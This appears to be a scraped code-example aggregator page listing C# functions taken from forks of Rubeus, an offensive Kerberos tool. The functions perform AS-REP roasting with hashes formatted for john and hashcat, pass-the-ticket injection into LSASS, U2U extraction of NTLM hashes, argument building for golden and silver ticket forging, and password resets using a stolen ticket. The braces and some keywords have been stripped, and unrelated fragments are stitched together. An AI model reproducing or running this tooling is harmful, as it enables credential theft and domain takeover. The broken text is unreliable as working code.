                        Console.WriteLine("      {0}", kirbiString);

                    KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

                    LSA.DisplayTicket(kirbi, 2, false, false, false, false,
                                      string.IsNullOrEmpty(servicekey) ? null : Helpers.StringToByteArray(servicekey), string.IsNullOrEmpty(asrepkey) ? null : Helpers.StringToByteArray(asrepkey));

                if (!String.IsNullOrEmpty(outfile))
                    outfile = Helpers.MakeValidFileName(outfile);
                    if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
                        if (display)
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);

                if (!String.IsNullOrEmpty(servicekey) && printargs)
                    var     decryptedEncTicket = cred.tickets[0].Decrypt(Helpers.StringToByteArray(servicekey), null);
                    PACTYPE pt = decryptedEncTicket.GetPac(null);
                    if (pt == null)
                        Console.WriteLine("[X] Unable to get the PAC");

                    string outArgs = String.Empty;

                    foreach (var pacInfoBuffer in pt.PacInfoBuffers)
                        if (pacInfoBuffer is LogonInfo li)
                            outArgs = String.Format("/user:{0} /id:{1} /pgid:{2} /logoncount:{3} /badpwdcount:{4} /sid:{5} /netbios:{6}", li.KerbValidationInfo.EffectiveName, li.KerbValidationInfo.UserId, li.KerbValidationInfo.PrimaryGroupId, li.KerbValidationInfo.LogonCount, li.KerbValidationInfo.BadPasswordCount, li.KerbValidationInfo.LogonDomainId.GetValue(), li.KerbValidationInfo.LogonDomainName);
                            if (!String.IsNullOrEmpty(li.KerbValidationInfo.FullName.ToString()))
                                outArgs = String.Format("{0} /displayname:\"{1}\"", outArgs, li.KerbValidationInfo.FullName);
                            if (!String.IsNullOrEmpty(li.KerbValidationInfo.LogonScript.ToString()))
                                outArgs = String.Format("{0} /scriptpath:\"{1}\"", outArgs, li.KerbValidationInfo.LogonScript);
                            if (!String.IsNullOrEmpty(li.KerbValidationInfo.ProfilePath.ToString()))
                                outArgs = String.Format("{0} /profilepath:\"{1}\"", outArgs, li.KerbValidationInfo.ProfilePath);
                            if (!String.IsNullOrEmpty(li.KerbValidationInfo.HomeDirectory.ToString()))
                                outArgs = String.Format("{0} /homedir:\"{1}\"", outArgs, li.KerbValidationInfo.HomeDirectory);
                            if (!String.IsNullOrEmpty(li.KerbValidationInfo.HomeDirectoryDrive.ToString()))
                                outArgs = String.Format("{0} /homedrive:\"{1}\"", outArgs, li.KerbValidationInfo.HomeDirectoryDrive);
                            if (li.KerbValidationInfo.GroupCount > 0)
                                outArgs = String.Format("{0} /groups:{1}", outArgs, li.KerbValidationInfo.GroupIds?.GetValue().Select(g => g.RelativeId.ToString()).Aggregate((cur, next) => cur + "," + next));
                            if (li.KerbValidationInfo.SidCount > 0)
                                outArgs = String.Format("{0} /sids:{1}", outArgs, li.KerbValidationInfo.ExtraSids.GetValue().Select(s => s.Sid.ToString()).Aggregate((cur, next) => cur + "," + next));
                            if (li.KerbValidationInfo.ResourceGroupCount > 0)
                                outArgs = String.Format("{0} /resourcegroupsid:{1} /resourcegroups:{2}", outArgs, li.KerbValidationInfo.ResourceGroupDomainSid.GetValue().ToString(), li.KerbValidationInfo.ResourceGroupIds.GetValue().Select(g => g.RelativeId.ToString()).Aggregate((cur, next) => cur + "," + next));
                                outArgs = String.Format("{0} /logofftime:\"{1}\"", outArgs, DateTime.FromFileTimeUtc((long)li.KerbValidationInfo.LogoffTime.LowDateTime | ((long)li.KerbValidationInfo.LogoffTime.HighDateTime << 32)).ToLocalTime());
                            catch { }
                            DateTime?passLastSet = null;
                                passLastSet = DateTime.FromFileTimeUtc((long)li.KerbValidationInfo.PasswordLastSet.LowDateTime | ((long)li.KerbValidationInfo.PasswordLastSet.HighDateTime << 32));
                            catch { }
                            if (passLastSet != null)
                                outArgs = String.Format("{0} /pwdlastset:\"{1}\"", outArgs, ((DateTime)passLastSet).ToLocalTime());
                                DateTime?passCanSet = null;
                                    passCanSet = DateTime.FromFileTimeUtc((long)li.KerbValidationInfo.PasswordCanChange.LowDateTime | ((long)li.KerbValidationInfo.PasswordCanChange.HighDateTime << 32));
                                catch { }
                                if (passCanSet != null)
                                    outArgs = String.Format("{0} /minpassage:{1}d", outArgs, (((DateTime)passCanSet) - ((DateTime)passLastSet)).Days);
                                DateTime?passMustSet = null;
                                    passCanSet = DateTime.FromFileTimeUtc((long)li.KerbValidationInfo.PasswordMustChange.LowDateTime | ((long)li.KerbValidationInfo.PasswordMustChange.HighDateTime << 32));
                                catch { }
                                if (passMustSet != null)
                                    outArgs = String.Format("{0} /maxpassage:{1}d", outArgs, (((DateTime)passMustSet) - ((DateTime)passLastSet)).Days);
                            if (!String.IsNullOrEmpty(li.KerbValidationInfo.LogonServer.ToString()))
                                outArgs = String.Format("{0} /dc:{1}.{2}", outArgs, li.KerbValidationInfo.LogonServer.ToString(), cred.tickets[0].realm);
                            if ((Interop.PacUserAccountControl)li.KerbValidationInfo.UserAccountControl != Interop.PacUserAccountControl.NORMAL_ACCOUNT)
                                outArgs = String.Format("{0} /uac:{1}", outArgs, String.Format("{0}", (Interop.PacUserAccountControl)li.KerbValidationInfo.UserAccountControl).Replace(" ", ""));

                    Console.WriteLine("\r\n[*] Printing argument list for use with Rubeus' 'golden' or 'silver' commands:\r\n\r\n{0}\r\n", outArgs);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #9
파일: Ask.cs 프로젝트: lunarobliq/Rubeus
        private static byte[] HandleASREP(AsnElt responseAsn, Interop.KERB_ETYPE etype, string keyString, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false, AS_REQ asReq = null, string serviceKey = "", bool getCredentials = false, string dcIP = "")
            // parse the response to an AS-REP
            AS_REP rep = new AS_REP(responseAsn);

            // convert the key string to bytes
            byte[] key;
            if (GetPKInitRequest(asReq, out PA_PK_AS_REQ pkAsReq))
                // generate the decryption key using Diffie Hellman shared secret
                PA_PK_AS_REP pkAsRep = (PA_PK_AS_REP)rep.padata[0].value;
                key = pkAsReq.Agreement.GenerateKey(pkAsRep.DHRepInfo.KDCDHKeyInfo.SubjectPublicKey.DepadLeft(), new byte[0],
                                                    pkAsRep.DHRepInfo.ServerDHNonce, GetKeySize(etype));
                // convert the key string to bytes
                key = Helpers.StringToByteArray(asReq.keyString);

            // decrypt the enc_part containing the session key/etc.
            // TODO: error checking on the decryption "failing"...
            byte[] outBytes;

            if (etype == Interop.KERB_ETYPE.des_cbc_md5)
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
            else if (etype == Interop.KERB_ETYPE.rc4_hmac)
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
            else if (etype == Interop.KERB_ETYPE.aes128_cts_hmac_sha1)
                // KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
                outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
            else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
                // KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
                outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                throw new RubeusException("[X] Encryption type \"" + etype + "\" not currently supported");

            AsnElt ae = AsnElt.Decode(outBytes);

            EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

            // now build the final KRB-CRED structure
            KRB_CRED cred = new KRB_CRED();

            // add the ticket

            // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

            KrbCredInfo info = new KrbCredInfo();

            // [0] add in the session key
            info.key.keytype  = encRepPart.key.keytype;
            info.key.keyvalue = encRepPart.key.keyvalue;

            // [1] prealm (domain)
            info.prealm = encRepPart.realm;

            // [2] pname (user)
            info.pname.name_type   = rep.cname.name_type;
            info.pname.name_string = rep.cname.name_string;

            // [3] flags
            info.flags = encRepPart.flags;

            // [4] authtime (not required)

            // [5] starttime
            info.starttime = encRepPart.starttime;

            // [6] endtime
            info.endtime = encRepPart.endtime;

            // [7] renew-till
            info.renew_till = encRepPart.renew_till;

            // [8] srealm
            info.srealm = encRepPart.realm;

            // [9] sname
            info.sname.name_type   = encRepPart.sname.name_type;
            info.sname.name_string = encRepPart.sname.name_string;

            // add the ticket_info into the cred object

            byte[] kirbiBytes = cred.Encode().Encode();

            if (verbose)
                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                if (Rubeus.Program.wrapTickets)
                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);
                    Console.WriteLine("      {0}", kirbiString);

            if (!String.IsNullOrEmpty(outfile))
                outfile = Helpers.MakeValidFileName(outfile);
                if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
                    if (verbose)
                        Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);

            if (ptt || ((ulong)luid != 0))
                // pass-the-ticket -> import into LSASS
                LSA.ImportTicket(kirbiBytes, luid);

            if (describe)
                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
                LSA.DisplayTicket(kirbi, 2, false, false, false, false, string.IsNullOrEmpty(serviceKey) ? null : Helpers.StringToByteArray(serviceKey), key);

            if (getCredentials)
                Console.WriteLine("[*] Getting credentials using U2U\r\n");
                byte[] u2uBytes    = TGS_REQ.NewTGSReq(info.pname.name_string[0], info.prealm, info.pname.name_string[0], cred.tickets[0], info.key.keyvalue, (Interop.KERB_ETYPE)info.key.keytype, Interop.KERB_ETYPE.subkey_keymaterial, false, String.Empty, false, false, false, false, cred, "", true);
                byte[] u2uResponse = Networking.SendBytes(dcIP, 88, u2uBytes);
                if (u2uResponse == null)
                AsnElt u2uResponseAsn = AsnElt.Decode(u2uResponse);

                // check the response value
                int responseTag = u2uResponseAsn.TagValue;

                if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                    // parse the response to an TGS-REP and get the PAC
                    TGS_REP       u2uRep           = new TGS_REP(u2uResponseAsn);
                    EncTicketPart u2uEncTicketPart = u2uRep.ticket.Decrypt(info.key.keyvalue, key);
                    PACTYPE       pt = u2uEncTicketPart.GetPac(key);

                    // look for the credential information and print
                    foreach (var pacInfoBuffer in pt.PacInfoBuffers)
                        if (pacInfoBuffer is PacCredentialInfo ci)
                            Console.WriteLine("  CredentialInfo         :");
                            Console.WriteLine("    Version              : {0}", ci.Version);
                            Console.WriteLine("    EncryptionType       : {0}", ci.EncryptionType);

                            if (ci.CredentialInfo.HasValue)
                                Console.WriteLine("    CredentialData       :");
                                Console.WriteLine("      CredentialCount    : {0}", ci.CredentialInfo.Value.CredentialCount);

                                foreach (var credData in ci.CredentialInfo.Value.Credentials)
                                    string hash = "";
                                    if ("NTLM".Equals(credData.PackageName.ToString()))
                                        int version = BitConverter.ToInt32((byte[])(Array)credData.Credentials, 0);
                                        int flags   = BitConverter.ToInt32((byte[])(Array)credData.Credentials, 4);
                                        if (flags == 3)
                                            hash = String.Format("{0}:{1}", Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(8).Take(16).ToArray()), Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(24).Take(16).ToArray()));
                                            hash = String.Format("{0}", Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(24).Take(16).ToArray()));
                                        hash = Helpers.ByteArrayToString((byte[])(Array)credData.Credentials);

                                    Console.WriteLine("       {0}              : {1}", credData.PackageName, hash);
                                Console.WriteLine("    CredentialData    :   *** NO KEY ***");
                else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                    // parse the response to an KRB-ERROR
                    KRB_ERROR error = new KRB_ERROR(u2uResponseAsn.Sub[0]);
                    Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                    Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);

예제 #10
        public static byte[] TGT(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", bool display = true)
            string dcIP = Networking.GetDCIP(domainController, display);

            if (String.IsNullOrEmpty(dcIP))

            if (display)
                Console.WriteLine("[*] Building TGS-REQ renewal for: '{0}\\{1}'", domain, userName);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, "krbtgt", providedTicket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial, true, "");

            byte[] response = Networking.SendBytes(dcIP.ToString(), 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] TGT renewal request successful!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                if (display)
                    Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);
                    if (false)
                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);
                        Console.WriteLine("      {0}", kirbiString);

                if (!String.IsNullOrEmpty(outfile))
                    outfile = Helpers.MakeValidFileName(outfile);
                    if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
                        if (display)
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);

                if (ptt)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new LUID());
            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #11
        public static void UserPassword(KRB_CRED kirbi, string newPassword, string domainController = "")
            // implements the Kerberos-based password reset originally disclosed by Aorato
            //      This function is misc::changepw in Kekeo
            // Takes a valid TGT .kirbi and builds a MS Kpasswd password change sequence
            //      AP-REQ with randomized sub session key
            //      KRB-PRIV structure containing ChangePasswdData, enc w/ the sub session key
            // reference: Microsoft Windows 2000 Kerberos Change Password and Set Password Protocols (RFC3244)

            Console.WriteLine("[*] Action: Reset User Password (AoratoPw)\r\n");

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            // extract the user and domain from the existing .kirbi ticket
            string userName   = kirbi.EncryptedPart.ticket_info[0].pname.name_string[0];
            string userDomain = kirbi.EncryptedPart.ticket_info[0].prealm;

            Console.WriteLine("[*] Changing password for user: {0}@{1}", userName, userDomain);
            Console.WriteLine("[*] New password value: {0}", newPassword);

            // build the AP_REQ using the user ticket's keytype and key
            Console.WriteLine("[*] Building AP-REQ for the MS Kpassword request");
            AP_REQ ap_req = new AP_REQ(userDomain, userName, kirbi.Tickets[0], kirbi.EncryptedPart.ticket_info[0].key.keyvalue, (Interop.KERB_ETYPE)kirbi.EncryptedPart.ticket_info[0].key.keytype, Interop.KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR);

            // create a new session subkey for the Authenticator and match the encryption type of the user key
            Console.WriteLine("[*] Building Authenticator with encryption key type: {0}", (Interop.KERB_ETYPE)kirbi.EncryptedPart.ticket_info[0].key.keytype);
            ap_req.authenticator.subkey         = new EncryptionKey();
            ap_req.authenticator.subkey.keytype = kirbi.EncryptedPart.ticket_info[0].key.keytype;

            // generate a random session subkey
            Random random = new Random();

            byte[]             randKeyBytes;
            Interop.KERB_ETYPE randKeyEtype = (Interop.KERB_ETYPE)kirbi.EncryptedPart.ticket_info[0].key.keytype;
            switch (randKeyEtype)
            case Interop.KERB_ETYPE.rc4_hmac:
                randKeyBytes = new byte[16];

            case Interop.KERB_ETYPE.aes256_cts_hmac_sha1:
                randKeyBytes = new byte[32];

                Console.WriteLine("[X] Only rc4_hmac and aes256_cts_hmac_sha1 key hashes supported at this time!");
            ap_req.authenticator.subkey.keyvalue = randKeyBytes;
            Console.WriteLine("[*] base64(session subkey): {0}", Convert.ToBase64String(randKeyBytes));

            // randKeyBytes is now the session key used for the KRB-PRIV structure
            // MIMIKATZ_NONCE ;)
            ap_req.authenticator.seq_number = 1818848256;

            // now build the KRV-PRIV structure
            Console.WriteLine("[*] Building the KRV-PRIV structure");
            KRB_PRIV changePriv = new KRB_PRIV(randKeyEtype, randKeyBytes);

            // the new password to set for the user
            changePriv.enc_part = new EncKrbPrivPart(newPassword, "lol");

            // now build the final MS Kpasswd request
            byte[] apReqBytes      = ap_req.Encode().Encode();
            byte[] changePrivBytes = changePriv.Encode().Encode();
            byte[] packetBytes     = new byte[10 + apReqBytes.Length + changePrivBytes.Length];
            short  msgLength       = (short)(packetBytes.Length - 4);

            byte[] msgLengthBytes = BitConverter.GetBytes(msgLength);

            // Record Mark
            packetBytes[2] = msgLengthBytes[0];
            packetBytes[3] = msgLengthBytes[1];

            // Message Length
            packetBytes[4] = msgLengthBytes[0];
            packetBytes[5] = msgLengthBytes[1];

            // Version (Reply)
            packetBytes[6] = 0x0;
            packetBytes[7] = 0x1;

            // AP_REQ Length
            short apReqLen = (short)(apReqBytes.Length);

            byte[] apReqLenBytes = BitConverter.GetBytes(apReqLen);
            packetBytes[8] = apReqLenBytes[0];
            packetBytes[9] = apReqLenBytes[1];

            // AP_REQ
            Array.Copy(apReqBytes, 0, packetBytes, 10, apReqBytes.Length);

            // KRV-PRIV
            Array.Copy(changePrivBytes, 0, packetBytes, apReqBytes.Length + 10, changePrivBytes.Length);

            // KPASSWD_DEFAULT_PORT = 464
            byte[] response = Networking.SendBytes(dcIP, 464, packetBytes, true);
            if (null == response)

            try {
                AsnElt responseAsn = AsnElt.Decode(response, false);
                // check the response value
                if (30 == responseAsn.TagValue)
                    // parse the response to an KRB-ERROR
                    long errorCode = new KRB_ERROR(responseAsn.FirstElement).ErrorCode;
                    Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", errorCode, (Interop.KERBEROS_ERROR)errorCode);
            catch { }

            // otherwise parse the resulting KRB-PRIV from the server
            int responseIndex  = 0;
            int respRecordMark = Helpers.ParseBigEndianInt32(response, ref responseIndex);
            int respMsgLen     = Helpers.ParseBigEndianInt16(response, ref responseIndex);
            int respVersion    = Helpers.ParseBigEndianInt16(response, ref responseIndex);
            int respAPReqLen   = Helpers.ParseBigEndianInt16(response, ref responseIndex);

            int respKRBPrivLen = respMsgLen - respAPReqLen - 6;

            byte[] respKRBPriv = new byte[respKRBPrivLen];
            Array.Copy(response, responseIndex + respAPReqLen, respKRBPriv, 0, respKRBPrivLen);

            // decode the KRB-PRIV response
            foreach (AsnElt elem in AsnElt.Decode(respKRBPriv, false).FirstElement.EnumerateElements())
                if (3 != elem.TagValue)
                byte[] encBytes    = elem.FirstElement.SecondElement.GetOctetString();
                byte[] decBytes    = Crypto.KerberosDecrypt(randKeyEtype, Interop.KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART, randKeyBytes, encBytes);
                AsnElt decBytesAsn = AsnElt.Decode(decBytes, false);

                byte[] responseCodeBytes = decBytesAsn.FirstElement.FirstElement.FirstElement.GetOctetString();
                short responseCode = BitConverter.ToInt16(responseCodeBytes, 0);
                if (0 == responseCode)
                    Console.WriteLine("[+] Password change success!");
                    Console.WriteLine("[X] Password change error: {0}", (Interop.KADMIN_PASSWD_ERR)responseCode);
예제 #12
        public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "")
            // roast AS-REPs for users without pre-authentication enabled

            Console.WriteLine("[*] Action: AS-REP Roasting");

            // grab the default DC if none was supplied
            if (String.IsNullOrEmpty(domainController))
                domainController = Networking.GetDCName();
                if (String.IsNullOrEmpty(domainController))
                    Console.WriteLine("[X] Error retrieving the current domain controller.");

            System.Net.IPAddress[] dcIP = null;

                dcIP = System.Net.Dns.GetHostAddresses(domainController);
            catch (Exception e) {
                Console.WriteLine("[X] Error retrieving IP for domain controller \"{0}\" : {1}", domainController, e.Message);
            Console.WriteLine("\r\n[*] Using domain controller: {0} ({1})", domainController, dcIP[0]);

            Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
            byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac);

            byte[] response = Networking.SendBytes(dcIP[0].ToString(), 88, reqBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 11)
                Console.WriteLine("[+] AS-REQ w/o preauth successful!");

                // parse the response to an AS-REP
                AS_REP rep = new AS_REP(response);

                // output the hash of the encrypted KERB-CRED in a crackable hash form
                string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
                repHash = repHash.Insert(32, "$");

                string hashString = "";
                if (format == "john")
                    hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash);
                    // eventual hashcat format
                    hashString = String.Format("$krb5asrep${0}$*{1}${2}*${3}${4}", (int)Interop.KERB_ETYPE.rc4_hmac, userName, domain, repHash.Substring(0, 32), repHash.Substring(32));

                Console.WriteLine("[*] AS-REP hash:\r\n");

                // display the base64 of a hash, columns of 80 chararacters
                foreach (string line in Helpers.Split(hashString, 80))
                    Console.WriteLine("      {0}", line);
            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #13
파일: Ask.cs 프로젝트: slooppe/SharpMapExec
        public static byte[] TGS(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, string service, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, string outfile = "", bool ptt = false, string domainController = "", bool display = true, bool enterprise = false, bool roast = false, bool opsec = false)
            string dcIP = Networking.GetDCIP(domainController, display);

            if (String.IsNullOrEmpty(dcIP))

            if (display)
                if (requestEType == Interop.KERB_ETYPE.subkey_keymaterial)
                    Console.WriteLine("[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket", requestEType);
                    Console.WriteLine("[*] Requesting '{0}' etype for the service ticket", requestEType);

                Console.WriteLine("[*] Building TGS-REQ request for: '{0}'", service);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, service, providedTicket, clientKey, paEType, requestEType, false, "", enterprise, roast, opsec);

            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                if (display)
                    Console.WriteLine("[+] TGS request successful!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);

                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(paEType, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // if using /opsec and the ticket is for a server configuration for unconstrained delegation, request a forwardable TGT
                if (opsec && (!roast) && ((encRepPart.flags & Interop.TicketFlags.ok_as_delegate) != 0))
                    byte[] tgtBytes = TGS_REQ.NewTGSReq(userName, domain, string.Format("krbtgt/{0}", domain), providedTicket, clientKey, paEType, requestEType, false, "", enterprise, roast, opsec, true);

                    byte[] tgtResponse = Networking.SendBytes(dcIP, 88, tgtBytes);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = rep.crealm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                if (ptt)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new LUID());

                if (display)
                    Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                    if (true)
                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);
                    Console.WriteLine("      {0}", kirbiString);

                    KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

                if (!String.IsNullOrEmpty(outfile))
                    outfile = Helpers.MakeValidFileName(outfile);
                    if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
                        if (display)
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #14
파일: Ask.cs 프로젝트: PowerOlive/Rubeus
        public static bool NoPreAuthTGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string domainController, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false, string proxyUrl = null)
            byte[] response       = null;
            AS_REQ NoPreAuthASREQ = AS_REQ.NewASReq(userName, domain, etype, true);

            byte[] reqBytes = NoPreAuthASREQ.Encode().Encode();

            if (String.IsNullOrEmpty(proxyUrl))
                string dcIP = Networking.GetDCIP(domainController, true, domain);
                if (String.IsNullOrEmpty(dcIP))

                response = Networking.SendBytes(dcIP, 88, reqBytes);
                KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(reqBytes);
                message.target_domain = NoPreAuthASREQ.req_body.realm;
                response = Networking.MakeProxyRequest(proxyUrl, message);

            if (response == null)

            // decode the supplied bytes to an AsnElt object
            AsnElt responseAsn = AsnElt.Decode(response);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
                Console.WriteLine("[-] AS-REQ w/o preauth successful! {0} has pre-authentication disabled!", userName);

                byte[] kirbiBytes = HandleASREP(responseAsn, etype, keyString, outfile, ptt, luid, describe, verbose);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
